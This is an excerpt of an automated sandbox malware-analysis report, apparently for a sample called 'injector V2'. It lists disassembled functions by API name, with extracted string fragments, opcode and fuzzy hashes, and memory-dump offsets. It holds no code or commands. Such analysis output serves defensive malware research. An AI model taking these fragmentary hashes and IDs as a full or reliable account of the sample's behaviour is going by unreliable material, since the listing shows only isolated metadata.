                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocString
                                                                                    • String ID: 0$@$A$A$C$E$G$I$K$L$L$M$M$O$P$Q$Q$S$U$W$_$`$b$g$g$i$m$v$~
                                                                                    • API String ID: 2525500382-777255578
                                                                                    • Opcode ID: 4148526136573acf949de041eea7d1bf3b492f16cc655e546ec20f77005a4a37
                                                                                    • Instruction ID: e4018db550d9f916cdea27e5f6493a1e96686a48c0e5d3e063ade476eea90165
                                                                                    • Opcode Fuzzy Hash: 4148526136573acf949de041eea7d1bf3b492f16cc655e546ec20f77005a4a37
                                                                                    • Instruction Fuzzy Hash: 9D81B66110CBC28DD332873C884879BBED16BA7224F584B9DD5ED8B3E2C7B944498767
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit
                                                                                    • String ID: $%$-$.$3$9$?$D$S$U$`
                                                                                    • API String ID: 2610073882-273062852
                                                                                    • Opcode ID: 8afb477ce0f2f7f69a292a13708c09511120daa34ae2ab9f63e52892dd6e61f3
                                                                                    • Instruction ID: 5a39445bae66aa0b67c9b84da12ea6a3cde0deb3dd98c502b3ef55c3d807de64
                                                                                    • Opcode Fuzzy Hash: 8afb477ce0f2f7f69a292a13708c09511120daa34ae2ab9f63e52892dd6e61f3
                                                                                    • Instruction Fuzzy Hash: 63412B7140D7C28AD3519B38898874FBFD16BDA228F484B9DF1E45B3E2C6B48506C757
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit
                                                                                    • String ID: $%$-$.$3$9$?$D$S$U$`
                                                                                    • API String ID: 2610073882-273062852
                                                                                    • Opcode ID: 44fe74e87aa43f3464d95880ce8f36bc6581fa8ad32c45d02a378784c3744d1c
                                                                                    • Instruction ID: 0f4017a0e70c4f862e4af95d7559c2be28ba6bf6baf8e43d4a43e16b836d11a1
                                                                                    • Opcode Fuzzy Hash: 44fe74e87aa43f3464d95880ce8f36bc6581fa8ad32c45d02a378784c3744d1c
                                                                                    • Instruction Fuzzy Hash: 0641187140D7C18AD311DB38888864BFFE16BDA624F484B9DF0E89B3E2C7B485058B97
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitVariant
                                                                                    • String ID: `$d$g$h$m$q$x$~
                                                                                    • API String ID: 1927566239-2962199023
                                                                                    • Opcode ID: 49b3455d79a840ba0ac55fcf7c02c3c7f1641a4a3ffaa97b9c92ac7c28ccf114
                                                                                    • Instruction ID: 8a9e5a14a64c7078d8552bf6a1c380d3a9083cc9617ce886f54da5de427395d5
                                                                                    • Opcode Fuzzy Hash: 49b3455d79a840ba0ac55fcf7c02c3c7f1641a4a3ffaa97b9c92ac7c28ccf114
                                                                                    • Instruction Fuzzy Hash: 0F51393050C7C2CAD3358B2888597DEBFE15BE6314F088A9DD4E88B7D2D6B941458B63
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: MetricsSystem
                                                                                    • String ID:
                                                                                    • API String ID: 4116985748-3916222277
                                                                                    • Opcode ID: 5c39f7027612a0070e4ffc29c651b3f433073beb857ec352cd464f46ece1cca8
                                                                                    • Instruction ID: bcf3280c43cee577f57b17f5916f8b881236042d1a2c30247715e4f12cf1bc4d
                                                                                    • Opcode Fuzzy Hash: 5c39f7027612a0070e4ffc29c651b3f433073beb857ec352cd464f46ece1cca8
                                                                                    • Instruction Fuzzy Hash: FC31ADB49183049FDB00EF6DD984619BBF0BF89704F11892EE498DB360D774AA49CB86
                                                                                    APIs
                                                                                    • CopyFileW.KERNEL32(?,B9F4BBC1,00000000), ref: 0042805E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: CopyFile
                                                                                    • String ID: *$*
                                                                                    • API String ID: 1304948518-3771216468
                                                                                    • Opcode ID: 5213059e2cf1ff3bd85a8ec57feb20daaa267110ed64e0b077f9cce5909a7b61
                                                                                    • Instruction ID: 21e9a9041225b6c5ceb73ac95c0eae95b8f8785af04b964e1be19c5000155ac1
                                                                                    • Opcode Fuzzy Hash: 5213059e2cf1ff3bd85a8ec57feb20daaa267110ed64e0b077f9cce5909a7b61
                                                                                    • Instruction Fuzzy Hash: 7211B1B85183449FE340DF24A84571FBBE4BB9A304F544A2DF5C69A281E7B5C20A8B1B